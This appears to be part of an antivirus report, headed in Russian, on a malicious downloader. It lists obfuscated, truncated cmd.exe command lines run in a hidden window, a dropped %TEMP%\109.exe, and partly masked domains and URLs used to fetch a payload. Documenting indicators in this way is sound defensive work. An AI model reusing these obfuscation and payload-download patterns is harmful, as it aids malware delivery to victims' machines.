Техническая информация
- '<SYSTEM32>\cmd.exe' wZRiwhJfF uoGFDZmwViVVuSwozQbK fiwFOrHBht & %co^m^S^p^E^c% /c ^c^M^d; ; ; /^V^ ^ ; ; /r" ;; (SE^T ^ Wt^b=nT1 1Hc ^aC5^ u^GQ HK^v nD0^ 5Jk L0^8 Nli ^MqW ^U2d 8zU ^e1I EKF ^aox cfg G^AZ^ ...
- %TEMP%\109.exe
- %TEMP%\109.exe
- 'co###page.com':80
- 'bu###rbean.se':80
- 'bo####ue-amour.jp':80
- 'bo####ue-amour.jp':443
- 'bi###nomad.com':80
- 'we#####designgarden.com':80
- 'we#####designgarden.com':443
- http://co###page.com/fLCt
- http://bu###rbean.se/KKHaZ8Oh
- http://bo####ue-amour.jp/958Jf
- http://bi###nomad.com/wp-content/jBN92RTl
- http://we#####designgarden.com/fmkE
- 'bo####ue-amour.jp':443
- 'we#####designgarden.com':443
- DNS ASK co###page.com
- DNS ASK bu###rbean.se
- DNS ASK bo####ue-amour.jp
- DNS ASK bi###nomad.com
- DNS ASK we#####designgarden.com
- '<SYSTEM32>\cmd.exe' wZRiwhJfF uoGFDZmwViVVuSwozQbK fiwFOrHBht & %co^m^S^p^E^c% /c ^c^M^d; ; ; /^V^ ^ ; ; /r" ;; (SE^T ^ Wt^b=nT1 1Hc ^aC5^ u^GQ HK^v nD0^ 5Jk L0^8 Nli ^MqW ^U2d 8zU ^e1I EKF ^aox cfg G^AZ^ ...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' ; ; ; /V ; ; /r" ;; (SE^T ^ Wt^b=nT1 1Hc ^aC5^ u^GQ HK^v nD0^ 5Jk L0^8 Nli ^MqW ^U2d 8zU ^e1I EKF ^aox cfg G^AZ^ 1^ym}^cAh}AKM{9^20hVR^vcrbBtdQU^azr8^c^5vL}P6T; s8k^7Jia6ov^e^E^sY^rT^Xob8...